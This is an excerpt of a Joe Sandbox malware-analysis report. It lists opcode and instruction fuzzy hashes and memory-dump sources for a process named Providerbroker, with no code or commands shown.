                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 5af7c358c9d5a7e7ffb26785d24a0f57d4c9134b7ee65f5da3e118bcd74700d5
                                                                                    • Instruction ID: 1d0c79a003c868497c3aba74126e2c97bbfc54731a9f20a5bdc5dfcae262a405
                                                                                    • Opcode Fuzzy Hash: 5af7c358c9d5a7e7ffb26785d24a0f57d4c9134b7ee65f5da3e118bcd74700d5
                                                                                    • Instruction Fuzzy Hash: 26C1AF305186868FEB29DF18C8E45B237A1FF45348B6545BDD85B8B68BCA38F885CB41
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2251466892.00007FF849590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849590000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_7ff849590000_Providerbroker.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 78f92479642af6c5cba55b517fd98781fc540d7effe3f08a5e1e0e9f6e0f7b55
                                                                                    • Instruction ID: 4d363306ae23fed542bb155b2aa7b84d70fcaf12fb010ec11912e8da39160273
                                                                                    • Opcode Fuzzy Hash: 78f92479642af6c5cba55b517fd98781fc540d7effe3f08a5e1e0e9f6e0f7b55
                                                                                    • Instruction Fuzzy Hash: F021D162D0D7D79EF2797E647C218B96690AF143F0F3A167AC42E464C2DD0C2C415B9E
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2251466892.00007FF849590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849590000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_7ff849590000_Providerbroker.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: bc6866d9688a75fd64660c1d73644b4e06b4ba11c9520eba57dc490f6f4fb03a
                                                                                    • Instruction ID: 9b935acc7fc9f438dcf0c2d8a88ba7143a1cb6b1983ef0fa173327502999ba20
                                                                                    • Opcode Fuzzy Hash: bc6866d9688a75fd64660c1d73644b4e06b4ba11c9520eba57dc490f6f4fb03a
                                                                                    • Instruction Fuzzy Hash: B4815731A1CA868FF3387E28984117573E5EF55398F26057EE4AFC7182DE2DB8028B55
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2251466892.00007FF849590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849590000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_7ff849590000_Providerbroker.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 397a333a347ecbce93406a283de9754dc88609719450c261c97150473f01fa9a
                                                                                    • Instruction ID: 3f64415110017b5f05aef2ceefbdf6f869d037e49b405cc3c917585d4b13eb9a
                                                                                    • Opcode Fuzzy Hash: 397a333a347ecbce93406a283de9754dc88609719450c261c97150473f01fa9a
                                                                                    • Instruction Fuzzy Hash: 96812731A0CA954FF7387F1898459B977E1EF41398F26057ED0AFC3182DE29B8028756
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2251466892.00007FF849590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849590000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_7ff849590000_Providerbroker.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 47cd2991cb1f496bf0baacff2a8a32d602030b416d283f01da9e1ffdd4da3eca
                                                                                    • Instruction ID: 9f3501f33de433be34023d3efe801b16c42966287d5b58fe5222674d4c6bc3d6
                                                                                    • Opcode Fuzzy Hash: 47cd2991cb1f496bf0baacff2a8a32d602030b416d283f01da9e1ffdd4da3eca
                                                                                    • Instruction Fuzzy Hash: 7E81BF30D1C58A8FFBA9EF6888556BCBBB2FF45388F250479D01ED7182DE286841C760
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2251466892.00007FF849590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849590000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_7ff849590000_Providerbroker.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: f28a7884855d03a75f120a1f4db2ee5a7e1c17ce6eda9cc9431ee0186db4466a
                                                                                    • Instruction ID: 31e1893f1a8a73aa516071ae84ae4d6bf1127c5f4126880d90ecbc21fcf49a73
                                                                                    • Opcode Fuzzy Hash: f28a7884855d03a75f120a1f4db2ee5a7e1c17ce6eda9cc9431ee0186db4466a
                                                                                    • Instruction Fuzzy Hash: B661153191C4CD4FF778FE1C8C565B837D0EF89364F2602B9D4AEC75A2DA18A9068781
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2251466892.00007FF849590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849590000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_7ff849590000_Providerbroker.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: ced9fd856ed37cc0550ef5ffbb8736129a72ecada39be8913a817bc9e66cbd67
                                                                                    • Instruction ID: 1a21e520b6f8d54fdea4e3817be5922e549e142d9a86395ade5623882b41c24e
                                                                                    • Opcode Fuzzy Hash: ced9fd856ed37cc0550ef5ffbb8736129a72ecada39be8913a817bc9e66cbd67
                                                                                    • Instruction Fuzzy Hash: 0E81B030D1D68E9EEBA4FF649854ABCBBA1FF45390F25007AD01ED7182DF286841C755
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2251466892.00007FF849590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849590000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_7ff849590000_Providerbroker.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 6bb005661f45a424b1ac91adebccb19309c6697346ceae4ba567c3e3fc278901
                                                                                    • Instruction ID: 1e8c26f67e50814eb44cfc8652e8901fb3e9912a088b23a2239b56248b8bb990
                                                                                    • Opcode Fuzzy Hash: 6bb005661f45a424b1ac91adebccb19309c6697346ceae4ba567c3e3fc278901
                                                                                    • Instruction Fuzzy Hash: CC81B13095CB868FF3A8EF18D88457177E1FF45348B25457DC8AA87A92CB29BC42CB40
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2251466892.00007FF849590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849590000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_7ff849590000_Providerbroker.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 6a0dccdab7a3f90608840b0e759a47d7031cf110a19793f54d44870e379fe128
                                                                                    • Instruction ID: f78bc6ca8d3028cbb2572f86b5e5cf4fa926b8189a434d7566decccdf41e0571
                                                                                    • Opcode Fuzzy Hash: 6a0dccdab7a3f90608840b0e759a47d7031cf110a19793f54d44870e379fe128
                                                                                    • Instruction Fuzzy Hash: 8851D230D1C99A8EFB6CAB2888666B877E1FF55344F2581F9C05EC7186DE3869848741
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2241317098.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_7ff848e90000_Providerbroker.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: bacc519803b4fc86bbbfec75d312680bafb963c364e3fa38316f36712c812359
                                                                                    • Instruction ID: 80b164753967896f73d2a92d6e805353c79cba8c6947550fc160ef6f9fe49ff9
                                                                                    • Opcode Fuzzy Hash: bacc519803b4fc86bbbfec75d312680bafb963c364e3fa38316f36712c812359
                                                                                    • Instruction Fuzzy Hash: 3A51AC71948A499FDB48FFA8E4956FCBBA0FF48350F14057AD00DD7296DB34A891CB84
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2251466892.00007FF849590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849590000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_7ff849590000_Providerbroker.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: b6abfa50b23a635370fa6267b25ddeca2b3253624e53213e6a9487917197fccf
                                                                                    • Instruction ID: 24193874c0138d0b3fcc1861348ef2c328118b262e23f8b1e21573dbaf39fc70
                                                                                    • Opcode Fuzzy Hash: b6abfa50b23a635370fa6267b25ddeca2b3253624e53213e6a9487917197fccf
                                                                                    • Instruction Fuzzy Hash: 4F31C171A1C7458FE77C6E1CAC4507973D9EF953F0B32153EE6AFC2182D929A802468A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2241317098.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_7ff848e90000_Providerbroker.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 8cb14db7d391cf80bb343da20f010636f99645597fd74a72df0ccbfd575c8714
                                                                                    • Instruction ID: aa3a2b78d1a096adce517f743fff3a17c1f9d33bfba1baa3c9fa1d0236a8e6a6
                                                                                    • Opcode Fuzzy Hash: 8cb14db7d391cf80bb343da20f010636f99645597fd74a72df0ccbfd575c8714
                                                                                    • Instruction Fuzzy Hash: 06415B70908A0D9FDB48FF98E495AECB7A1FF58351F14017AD40DD3296DF34A8418B94
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2241317098.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_7ff848e90000_Providerbroker.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 0abc774098416356dee1def43f7abca88ac204ccb848ee5d1bd989baf572d4e2
                                                                                    • Instruction ID: c787d4820644f8b95501c4f0818b2dd0067b9c012716759582a1cf2f4b296e67
                                                                                    • Opcode Fuzzy Hash: 0abc774098416356dee1def43f7abca88ac204ccb848ee5d1bd989baf572d4e2
                                                                                    • Instruction Fuzzy Hash: 5D516A74A08A0E9FCF84EF58D484AED7BF1FF58355F050169E419E7260DB34E9908B94
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2251466892.00007FF849590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849590000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_7ff849590000_Providerbroker.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: a4fed93ef907dea418af7e9625d87b8b08bdddf00b7716162509137a6e53ab7e
                                                                                    • Instruction ID: 9db56fd578adaf80d8d0b3d7a7e4b6834bbc1edbb2172c5b798cdab9af99ac39
                                                                                    • Opcode Fuzzy Hash: a4fed93ef907dea418af7e9625d87b8b08bdddf00b7716162509137a6e53ab7e
                                                                                    • Instruction Fuzzy Hash: F141063184E3C98FF713AB34AC156F93FA0EF43368F1901EAD099CA0A3E6695516C752
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2251466892.00007FF849590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849590000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_7ff849590000_Providerbroker.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 72cb3e768103569acb77560856180933aadc175963492d5d9a314a68410ea9cd
                                                                                    • Instruction ID: 8f4253851eac11edd90746fa6d76886dbe8fc471867c368f0f89d0df635d499e
                                                                                    • Opcode Fuzzy Hash: 72cb3e768103569acb77560856180933aadc175963492d5d9a314a68410ea9cd
                                                                                    • Instruction Fuzzy Hash: 8941E330D5C9AE8EFB78EB1888547B8B7A1FF54344F2585B9C45EC7186CE386D858740
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2251466892.00007FF849590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849590000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_7ff849590000_Providerbroker.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: ee3c3b6d39ba5e99fedb8753fe67aba0eb2c7337fdc1e705debc7db7688d3386
                                                                                    • Instruction ID: 07f9fd6231f12d1cdc667acafec0537f716a12da1c0b9b24238695ad0a77d164
                                                                                    • Opcode Fuzzy Hash: ee3c3b6d39ba5e99fedb8753fe67aba0eb2c7337fdc1e705debc7db7688d3386
                                                                                    • Instruction Fuzzy Hash: 5341B430D1C99A8EF778EF1488946B477A2FF54340F2582B9D06EC71C6CA38A9858B80
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2251466892.00007FF849590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849590000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_7ff849590000_Providerbroker.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: a1c770e91bd1d9bc5a703c48291592a366639a346b66663f0e754fb132d14350
                                                                                    • Instruction ID: 1eee77472aa928fb1aad4aa2e3bbd993efd26e0b0b9208318df374f83df1721a
                                                                                    • Opcode Fuzzy Hash: a1c770e91bd1d9bc5a703c48291592a366639a346b66663f0e754fb132d14350
                                                                                    • Instruction Fuzzy Hash: 8F419231A0CA498FDF98FF28D495DA4B3E1FF69324B1401AAD40ED3292CE35E845CB85
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2251466892.00007FF849590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849590000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_7ff849590000_Providerbroker.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: c69a5c60433f56a4f515bd3e6bfe01894198bf0408f5bf1cb43dde94a5e63f3d
                                                                                    • Instruction ID: 6926d9ec652c207eefceb7015d31e2667a3ad2b755337c272aaf77cfea10a46b
                                                                                    • Opcode Fuzzy Hash: c69a5c60433f56a4f515bd3e6bfe01894198bf0408f5bf1cb43dde94a5e63f3d
                                                                                    • Instruction Fuzzy Hash: E641843160CA598FDF98FF28D465AA577E1FB68324F1401AAD00EC3282CE35ED45CB81
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2251466892.00007FF849590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849590000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_7ff849590000_Providerbroker.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: bf17601a9f3a8c42874ce08979a714ea604020c706bf92da31efbb43c3d8697f
                                                                                    • Instruction ID: 0f86e9739d51ef04680cb38f24f38b93996b98be452ea13b6c0054e80d145161
                                                                                    • Opcode Fuzzy Hash: bf17601a9f3a8c42874ce08979a714ea604020c706bf92da31efbb43c3d8697f
                                                                                    • Instruction Fuzzy Hash: E0316F31A0CA558FDB9CEF28C465AA477E1FB68314F1402A9D04EC7292CE34ED45CB81
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2251466892.00007FF849590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849590000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_7ff849590000_Providerbroker.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: c709304e838e99f9e7efeaed4536c20ceca864cff1d4ed37458be424ce0ac064
                                                                                    • Instruction ID: 226269268ba87d90ae54c8e36ed31dcb54a69d842ca6898d3d947617dba79c56
                                                                                    • Opcode Fuzzy Hash: c709304e838e99f9e7efeaed4536c20ceca864cff1d4ed37458be424ce0ac064
                                                                                    • Instruction Fuzzy Hash: A4317031A0CA498FDB9CEF28C4A5DA4B7E1FB69314B1402EAD41EC7193CE24E845CB85
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2251466892.00007FF849590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849590000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_7ff849590000_Providerbroker.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 1c4782a1888eefc7de995904dd9153a21bb67f187824a876a646b7e2821282b9
                                                                                    • Instruction ID: d8e3d14b36ed7e7f6dc68c7cefe9e2cf2a16c313148412b85a2b02abe6c0f088
                                                                                    • Opcode Fuzzy Hash: 1c4782a1888eefc7de995904dd9153a21bb67f187824a876a646b7e2821282b9
                                                                                    • Instruction Fuzzy Hash: F931413160CA558FDBACEF28C465AA577E1FB68314F1442ADD00EC7292DE39ED45CB81
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2251466892.00007FF849590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849590000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_7ff849590000_Providerbroker.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: df504c8b88c62bced0f99b1b564ddac0e8e3bdc9ddaeee2a9c73d58086fb737a
                                                                                    • Instruction ID: ea4747c62ca9f870199a4625dce09197897bdaee6c055436a0238a90037a17d2
                                                                                    • Opcode Fuzzy Hash: df504c8b88c62bced0f99b1b564ddac0e8e3bdc9ddaeee2a9c73d58086fb737a
                                                                                    • Instruction Fuzzy Hash: 19316031A0CA499FDB98FF28C4A5DA4B7E1FB69314B1401EAD40ED7292CE34E845CB85
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2241317098.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_7ff848e90000_Providerbroker.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 433714b8f46b58d74693557872ede64aa95e9f8c99e04f385b1dabc79ccec758
                                                                                    • Instruction ID: 3899f107ae9a2d0a7a7b4299fa8cd1c31fbc9495eff5d980cd3263f1ab4f031d
                                                                                    • Opcode Fuzzy Hash: 433714b8f46b58d74693557872ede64aa95e9f8c99e04f385b1dabc79ccec758
                                                                                    • Instruction Fuzzy Hash: 0F41F770A18A0D9FDB84EF98D495AEDBBF1FF58741F10016AE40DE3295DB34A8518B44
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2251466892.00007FF849590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849590000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_7ff849590000_Providerbroker.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 2b12deeb09e560e4b09967c7d1d2917ce7e6b6610a59fd96eda22f7229f9d294
                                                                                    • Instruction ID: b9b1e43e83be1a2849fb7409cdc1b9948a4791fc257561cdd77489bca438079e
                                                                                    • Opcode Fuzzy Hash: 2b12deeb09e560e4b09967c7d1d2917ce7e6b6610a59fd96eda22f7229f9d294
                                                                                    • Instruction Fuzzy Hash: 1B31D72094E3C58FF713A734AC546E93F61AF43368F2D01EAD095CE0A3DA990516C752
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2251466892.00007FF849590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849590000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_7ff849590000_Providerbroker.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 362e4e0f1b8a476ad8b6a01f5fcb19d81452f6ef8ea6e398f142358ef4f00c36
                                                                                    • Instruction ID: 61b34e752ce6f5be00e876e2716e82ec4db6fcf83300df666f57401d5870762a
                                                                                    • Opcode Fuzzy Hash: 362e4e0f1b8a476ad8b6a01f5fcb19d81452f6ef8ea6e398f142358ef4f00c36
                                                                                    • Instruction Fuzzy Hash: 82316031F1C95A8FEB58FE5CD4919A8B7E2FF59354B154179C01ED3682CF24B8128B81
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2251466892.00007FF849590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849590000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_7ff849590000_Providerbroker.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 7d5a77d2426afbbb6b85f4418aa4cadcd8729db334bfb55500421ef8c5dc6d2a
                                                                                    • Instruction ID: 466d743ef381592610f2a65207c7f9d6b3c901524a3664bd4f4486e18e158a9e
                                                                                    • Opcode Fuzzy Hash: 7d5a77d2426afbbb6b85f4418aa4cadcd8729db334bfb55500421ef8c5dc6d2a
                                                                                    • Instruction Fuzzy Hash: 1C313B30D1C99ACFEBA8EF5488559BD77B1FF44388F6201BAD02ECB581DA396D409741
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2251466892.00007FF849590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849590000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_7ff849590000_Providerbroker.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 9ee3f265a6dfe947351183503c17598667ef861ab2f98b747cf19d3318746487
                                                                                    • Instruction ID: c95265c5a2294f310f2ae02807b0c2c0421e6e1ce7dc4f198823ee2ba772687f
                                                                                    • Opcode Fuzzy Hash: 9ee3f265a6dfe947351183503c17598667ef861ab2f98b747cf19d3318746487
                                                                                    • Instruction Fuzzy Hash: 1731E471D1C98A4FFB68BF2858522A8B7E1FF45358F65017AE06DC72C2DE1C68058391
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2251466892.00007FF849590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849590000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_7ff849590000_Providerbroker.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 0150628249eade127fb51c936fccc2c0313baa41761168ee00a09cc48ee307a2
                                                                                    • Instruction ID: 2cf15a94529aa78de8b5707e660e9225a5ed12f659fb23563538c8e76f3eb084
                                                                                    • Opcode Fuzzy Hash: 0150628249eade127fb51c936fccc2c0313baa41761168ee00a09cc48ee307a2
                                                                                    • Instruction Fuzzy Hash: E5311E71E1C95A9FEB58EF5CD891AB8B3A1FF58354B218139D01DD7681CB24BC118B80
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2251466892.00007FF849590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849590000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_7ff849590000_Providerbroker.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 355d19c53c42c3efba36a8a0ecd43656cbdc1763bef4f4ce03238d23875b9b14
                                                                                    • Instruction ID: 17a3abc21a595fae38c50ef96ac2c16043e7ac4095f291d0cd7da03b9fbc3eed
                                                                                    • Opcode Fuzzy Hash: 355d19c53c42c3efba36a8a0ecd43656cbdc1763bef4f4ce03238d23875b9b14
                                                                                    • Instruction Fuzzy Hash: B631D531E1C9964FF768BA6858517F8B7D1FF9A394F550179C06DC72C2EE1868058381
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2251466892.00007FF849590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849590000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_7ff849590000_Providerbroker.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: b6d92145a85b0f272a0b7133d652a330ad2bc8bc698f321b0318d6e792dbe971
                                                                                    • Instruction ID: ef4a108c41d5a4d71c1853a7f2f58392efe80ec5e918c6f013611e23b27b7e57
                                                                                    • Opcode Fuzzy Hash: b6d92145a85b0f272a0b7133d652a330ad2bc8bc698f321b0318d6e792dbe971
                                                                                    • Instruction Fuzzy Hash: 67310770E189599FEBA8EF58C855AADB7F1FF59314F1000BED01EE3291CB34A9808B00
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2251466892.00007FF849590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849590000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_7ff849590000_Providerbroker.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 2c93f601890765bda86f15c64a78e777adbfefa92d5a6dc25e201f5b0537e6c1
                                                                                    • Instruction ID: 57c3dc2bb3a859ce10f1f04757c6e8b225ee7fff3b2239cc02f7c821ce132fcf
                                                                                    • Opcode Fuzzy Hash: 2c93f601890765bda86f15c64a78e777adbfefa92d5a6dc25e201f5b0537e6c1
                                                                                    • Instruction Fuzzy Hash: 1631BF31D2DACD8FDBA5EF64CC605AC7BB1FF5A350F2500BAD00AE7192DA286805CB55
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2251466892.00007FF849590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849590000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_7ff849590000_Providerbroker.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 4d66d5788125681974557876720ed2b46dd0e092ff259737661b13db849ed51a
                                                                                    • Instruction ID: 5894d22f5037d680eff40843e4f2a5a2b7a7b3be048111fc50ca81b3d09a1f37
                                                                                    • Opcode Fuzzy Hash: 4d66d5788125681974557876720ed2b46dd0e092ff259737661b13db849ed51a
                                                                                    • Instruction Fuzzy Hash: 4E31381081C5D74EF33AAA185C615707BA1EF93305B3A86FAD0ABCB4CBD92CA8858341
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2241317098.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_7ff848e90000_Providerbroker.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: f3a76772ff89fa0896eb9ed05eb98717303048b2eb5e8dbcd33fc14f07e03ffa
                                                                                    • Instruction ID: 8b036588471a0013c0bef9f63d200e0fa07d475d6221d2d89adf6890213898d2
                                                                                    • Opcode Fuzzy Hash: f3a76772ff89fa0896eb9ed05eb98717303048b2eb5e8dbcd33fc14f07e03ffa
                                                                                    • Instruction Fuzzy Hash: 3031B6B0A0851C9FDBA8EB04C895BE9B3F1FB68305F5011EE910EE3261CA716AC0CF45
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2241317098.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_7ff848e90000_Providerbroker.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 96275c0db77e8b5782ee6b58a9882f3983f7882c55350684b3022dc5917c00b5
